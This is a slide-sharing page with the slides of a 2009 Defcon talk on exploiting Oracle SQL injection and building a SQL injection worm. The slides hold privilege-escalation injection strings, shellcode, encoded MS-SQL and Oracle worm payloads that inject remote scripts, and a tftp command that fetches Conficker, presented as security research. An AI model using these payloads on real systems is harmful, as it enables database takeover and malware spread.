Give Me Three Things: Anti-Virus Bypass Made Easy
 
Defcon 17 Tactical Fingerprinting using Foca
Defcon 17 Tactical Fingerprinting using FocaDefcon 17 Tactical Fingerprinting using Foca
Defcon 17 Tactical Fingerprinting using Foca
 
New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
26066395 k-r-i-m-i-n-a-l-i-s-t-i-k-aa
26066395 k-r-i-m-i-n-a-l-i-s-t-i-k-aa26066395 k-r-i-m-i-n-a-l-i-s-t-i-k-aa
26066395 k-r-i-m-i-n-a-l-i-s-t-i-k-aa
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23
 
Hacking Windows 95 #33c3
Hacking Windows 95 #33c3Hacking Windows 95 #33c3
Hacking Windows 95 #33c3
 
Kontrollimi Teknik I Automjeteve Te Lehta
Kontrollimi Teknik I Automjeteve Te LehtaKontrollimi Teknik I Automjeteve Te Lehta
Kontrollimi Teknik I Automjeteve Te Lehta
 
Gjuha c++
Gjuha c++Gjuha c++
Gjuha c++
 
DEFCON17 - Your Mind: Legal Status, Rights and Securing Yourself
DEFCON17 - Your Mind: Legal Status, Rights and Securing YourselfDEFCON17 - Your Mind: Legal Status, Rights and Securing Yourself
DEFCON17 - Your Mind: Legal Status, Rights and Securing Yourself
 
PUNIM SEMINARIK "SHKENCA"
PUNIM SEMINARIK "SHKENCA"PUNIM SEMINARIK "SHKENCA"
PUNIM SEMINARIK "SHKENCA"
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 

Similaire à Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm

Cursor injection
Cursor injectionCursor injection
Cursor injectionfangjiafu
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthNew and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthowaspindia
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsAlex Zaballa
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsAlex Zaballa
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)Igor Bronovskyy
 
References - sql injection
References - sql injection References - sql injection
References - sql injection Mohammed
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.Dmitry Iudin
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers dofangjiafu
 
One Click Provisioning With Enterprise Manager 12c
One Click Provisioning With Enterprise Manager 12cOne Click Provisioning With Enterprise Manager 12c
One Click Provisioning With Enterprise Manager 12cJosh Turner
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)Ferruh Mavituna
 
Demo for Why Use PowerShell
Demo for Why Use PowerShellDemo for Why Use PowerShell
Demo for Why Use PowerShellSirajJamdar
 
07 Using Oracle-Supported Package in Application Development
07 Using Oracle-Supported Package in Application Development07 Using Oracle-Supported Package in Application Development
07 Using Oracle-Supported Package in Application Developmentrehaniltifat
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Useful PL/SQL Supplied Packages
Useful PL/SQL Supplied PackagesUseful PL/SQL Supplied Packages
Useful PL/SQL Supplied PackagesMaria Colgan
 

Similaire à Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm (20)

Cursor injection
Cursor injectionCursor injection
Cursor injection
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthNew and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharth
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9
 
Intro to Laravel 4
Intro to Laravel 4Intro to Laravel 4
Intro to Laravel 4
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
 
References
References References
References
 
References - sql injection
References - sql injection References - sql injection
References - sql injection
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers do
 
One Click Provisioning With Enterprise Manager 12c
One Click Provisioning With Enterprise Manager 12cOne Click Provisioning With Enterprise Manager 12c
One Click Provisioning With Enterprise Manager 12c
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)
 
Demo for Why Use PowerShell
Demo for Why Use PowerShellDemo for Why Use PowerShell
Demo for Why Use PowerShell
 
07 Using Oracle-Supported Package in Application Development
07 Using Oracle-Supported Package in Application Development07 Using Oracle-Supported Package in Application Development
07 Using Oracle-Supported Package in Application Development
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
 
plsql les06
plsql les06 plsql les06
plsql les06
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Useful PL/SQL Supplied Packages
Useful PL/SQL Supplied PackagesUseful PL/SQL Supplied Packages
Useful PL/SQL Supplied Packages
 

Dernier

How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 

Dernier (20)

How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 

Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm

  • 1. The Making Of Second SQL Injection Worm (Oracle Edition) Sumit Siddharth SID@notsosecure.com www.notsosecure.com Defcon 17 Las Vegas –2009
  • 2. About Me: Senior IT Security Consultant More than 4 years of Penetration Testing Not an Oracle Geek :( My Blog: www.notsosecure.com 10 slides + 2 Demos= 20 Mins !! Defcon 17, Las Vegas, July 2009 2
  • 3. Agenda How to exploit SQL Injections in web applications with oracle back-end to achieve the following: Escalate privileges from the session user to that of SYS (Similar to openrowset hacks in MS SQL) Execute OS Commands and achieve file system read/write access (Like xp_cmdshell in MS SQL) Can worms target Oracle web apps? (Just as they did against MS SQL) Defcon 17, Las Vegas, July 2009 3
  • 4. Oracle: How Things Work By default Oracle comes with a lot of stored procedures and functions. Mostly these functions and stored procedures run with definer privileges (default). In order to make the function execute with the privileges of the user executing it, the function must have 'authid current_user' keyword. If you find a SQL (PL/SQL) injection in a function owned by SYS and with 'authid definer', you can run SQL (PL/SQL) as SYS. Defcon 17, Las Vegas, July 2009 4
  • 5. SQL Injection in Oracle: • PL/SQL Injection • SQL Injection • Injection in • Injection in Single SQL Anonymous Statement PL/SQL block • Restrictions • No ';' allowed • No Restriction • Need more vulnerabilities • Execute DDL, DML • Difficult • Easy Defcon 17, Las Vegas, July 2009 5
  • 6. PL/SQL Injection  Injection in Anonymous PL/SQL block create or replace procedure orasso.test (q IN varchar2) AS BEGIN execute immediate ('begin '||q||'; end;'); END; * Attack has no limitation * Can Execute DML and DDL statements * Easy to exploit * Can Execute Multiple statements: * q=>null;execute immediate 'grant dba to public';end'-- Defcon 17, Las Vegas, July 2009 6
  • 7. PL/SQL Injection from Web Apps  Vulnerable Oracle Application server allows PL/SQL injection  Bypass the PL/SQL exclusion list:  http://host:7777/pls/orasso/orasso.home?);execute+immediate+:1; --={PL/SQL}  Execute PL/SQL with permissions of user described in 'DAD' (orasso_public)  Exploit vulnerable procedures and become DBA  Don't rely on 'create function' privileges  LT.COMPRESSWORKSPACETREE (CPU Oct 2008; milw0rm:7677)  LT.FINDRICSET (CPU October 2007; milw0rm:4572)  .....100 more of these.....  Execute OS code (I Prefer Java) Defcon 17, Las Vegas, July 2009 7
  • 8. Hacking OAS with OAP_Hacker.pl  OAP_hacker.pl  Supports O.A.S <=10.1.2.2 Relies on PL/SQL injection vulnerability Exploits vulnerable packages and grants DBA to 'public'  Generally orasso_public do not have create function privilege  Exploit based on Cursor Injection; Don't need create function OS code execution based on Java Demo Defcon 17, Las Vegas, July 2009 8
  • 9. PL/SQL Injection  Custom written Packages deployed on OAS may have PL/SQL Injection  Example: create or replace procedure orasso.test(q IN varchar2) AS BEGIN .... execute immediate ('begin '||q||'; end;'); ..... end;  http://host/pls/orasso/orasso.test?q=orasso.home  http://host/pls/orasso/orasso.test?q=execute Immediate 'grant dba to public' Defcon 17, Las Vegas, July 2009 9
  • 10. SQL Injection In Web Apps. Injection in Single SQL statement: e.g. “Select a from b where c=”.'$input' Oracle does not support nested query in SQL To execute multiple query we need to find a PL/SQL Injection. How can we inject PL/SQL when the web application's SQL Injection allows only SQL? If there is a PL/SQL injection vulnerability in a function, then we can use web's SQL Injection to call this function, thereby executing PL/SQL via SQL Injection. Defcon 17, Las Vegas, July 2009 10
  • 11. SQL Injection and Vulnerable Functions We can call functions in SQL but not procedures Exploit Functions vulnerable to Buffer overflow and other issues MDSYS.MD2.SDO_CODE_SIZE('AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD DDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGG GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHH HHHHHHHHHHH'||CHR(131)||CHR(195)||CHR(9)||CHR(255)||CHR (227)||CHR(251)||CHR(90)|| CHR(19)||CHR(124)||CHR(54)||CHR(141)||CHR(67)||CHR(19)||CHR(80)||chr(184)||chr(191)|| chr(142)||chr(01)||chr(120)||chr(255)||chr(208)||chr(184)||chr(147)||chr(131)||chr(00)||chr(120)|| chr(255)||chr(208)||'dir >c:dir.txt')-- Exploit Functions vulnerable to PL/SQL Injection ➔If Authid=definer; execute PL/SQL with definer privileges ➔If Authid=current_user; execute PL/SQL; exploit vulnerable packages ➔Privilege escalation; become DBA ➔Execute OS Code Defcon 17, Las Vegas, July 2009 11
  • 12. Introducing Dbms_Export_Extension Its an Oracle package which has had a number of functions and procedures vulnerable to PL/SQL injections, allowing privilege escalation. GET_DOMAIN_INDEX_TABLES(); function vulnerable to PL/SQL Injection; owned by sys; runs as sys We can inject PL/SQL within this function and the PL/SQL will get executed as SYS. The Function can be called from SQL queries such as SELECT, INSERT, UPDATE etc. Defcon 17, Las Vegas, July 2009 12
  • 13. PL/SQL Injection in dbms_export_extension FUNCTION GET_DOMAIN_INDEX_TABLES ( INDEX_NAME IN VARCHAR2, INDEX_SCHEMA IN VARCHAR2, TYPE_NAME IN VARCHAR2, TYPE_SCHEMA IN VARCHAR2, READ_ONLY IN PLS_INTEGER, VERSION IN VARCHAR2, GET_TABLES IN PLS_INTEGER) RETURN VARCHAR2 IS BEGIN [...] STMTSTRING := 'BEGIN ' || '"' || TYPE_SCHEMA || '"."' || TYPE_NAME || '".ODCIIndexUtilCleanup(:p1); ' || 'END;'; DBMS_SQL.PARSE(CRS, STMTSTRING, DBMS_SYS_SQL.V7); DBMS_SQL.BIND_VARIABLE(CRS,':p1',GETTABLENAMES_CONTEXT); [...] END GET_DOMAIN_INDEX_TABLES; Defcon 17, Las Vegas, July 2009 13
  • 14. Example select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_ INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PU T(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' grant dba to public'''';END;'';END;-- ','SYS',0,'1',0) from dual Fixed in CPU April 2006. Vulnerable versions: Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2, XE Defcon 17, Las Vegas, July 2009 14
  • 15. Bsqlbf v2.3 Uses this Oracle exploit to achieve the following: Privilege escalation (Type 3) OS code execution (Type 4)  with Java (default; stype 0)  with plsql_native_make_utility (Oracle 9; stype 1)  with dbms_scheduler (oracle 10; stype 2) File system read/write access (Type 5;Java only) Demo available at www.notsosecure.com Defcon 17, Las Vegas, July 2009 15
  • 16. SQL Injection w0rms  MS-SQL:  s=290';DECLARE%20@S %20NVARCHAR(4000);=CAST(0x6400650063006C00610072006500200040006D0020007600610072006300680061007200280038003000300030002900 3B00730065007400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D002B0027007500700064006100740065 005B0027002B0061002E006E0061006D0065002B0027005D007300650074005B0027002B0062002E006E0061006D0065002B0027005D003D0072007400 720069006D00280063006F006E007600650072007400280076006100720063006800610072002C0027002B0062002E006E0061006D0065002B002700290 029002B00270027003C0073006300720069007000740020007300720063003D00220068007400740070003A002F002F0079006C00310038002E006E0065 0074002F0030002E006A00730022003E003C002F007300630072006900700074003E00270027003B0027002000660072006F006D002000640062006F002 E007300790073006F0062006A006500630074007300200061002C00640062006F002E0073007900730063006F006C0075006D006E007300200062002C00 640062006F002E007300790073007400790070006500730020006300200077006800650072006500200061002E00690064003D0062002E0069006400200 061006E006400200061002E00780074007900700065003D0027005500270061006E006400200062002E00780074007900700065003D0063002E00780074 00790070006500200061006E006400200063002E006E0061006D0065003D002700760061007200630068006100720027003B00730065007400200040006 D003D005200450056004500520053004500280040006D0029003B00730065007400200040006D003D0073007500620073007400720069006E006700280 040006D002C0050004100540049004E004400450058002800270025003B00250027002C0040006D0029002C00380030003000300029003B00730065007 400200040006D003D005200450056004500520053004500280040006D0029003B006500780065006300280040006D0029003B00%20AS %20NVARCHAR(4000));EXEC(@S);--  Oracle:  http://127.0.0.1:81/ora4.php?name=1 and 1=(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin execute immediate '''''''' alter session set current_schema=SCOTT ''''''''; execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)||chr(97)||chr(116)|| chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||C.column_name||chr(61)||C.column_name|| chr(124)||chr(124)||chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||chr(115)||chr(114)||chr(99)|| chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)|| chr(111)||chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)||chr(46)||chr(99)||chr(111)|| chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)|| chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME = C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr(82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr(72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE rec.foo;end loop;execute immediate ''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)-- Defcon 17, Las Vegas, July 2009 16
  • 17. What 'could' the worm do  Update certain database tables The website not starts to distribute malware Pwn legitimate users of the site with browser exploits  There are enough 'ie' 0 days out there.  OS code execution allows distribution of other worms such as Conflicker! select LinxRunCmd('tftp -i x.x.x.x GET conflicker.exe') from dual  Exploit other Oracle components on internal network Oracle Secure back-up; Remote Command Injection (CPU 2009) SQL Injection in Oracle Enterprise Manager (CPU 2009) TNS Listener exploits (milw0rm: 8507) ....100 other things to do.... Defcon 17, Las Vegas, July 2009 17
  • 18. Demos Demo 1: Hacking OAS with OAS_hacker.pl Demo 2: Privilege escalation; Extracting data with SYS privileges (visit www.notsosecure.com) Demo 3: O.S code execution; With Java (@ notsosecure) Demo 4: P.O.C for a potential Oracle SQL Injection worm Defcon 17, Las Vegas, July 2009 18
  • 19. Thank You References: http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_kupw$worker2.html  http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_lt_findricset.html  http://www.breach.com/resources/breach-security-labs/alerts/breach-security-labs-releases-alert-on-oracle-application-ser  http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html  http://sec.hebei.com.cn/bbs_topic.do?forumID=18&postID=4275&replyID=0&skin=1&saveSkin=true&pages=0&replyNum  http://milw0rm.com/exploits/3269  http://www.securityfocus.com/bid/17699  http://www.orafaq.com/wiki/PL/SQL_FAQ#What_is_the_difference_between_SQL_and_PL.2FSQL.3F  http://www.red-database-security.com/wp/confidence2009.pdf  http://alloracletech.blogspot.com/2008/07/authid-definer-vs-authid-currentuser.html  http://www.owasp.org/index.php/Testing_for_Oracle  http://www.red-database-security.com/wp/google_oracle_hacking_us.pdf  http://lab.mediaservice.net/notes_more.php?id=Oracle_Portal_for_Friends  http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_kupw$worker2.html  http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-fayo.pdf   And Lots more; can't fit in the space here.... Defcon 17, Las Vegas, July 2009 19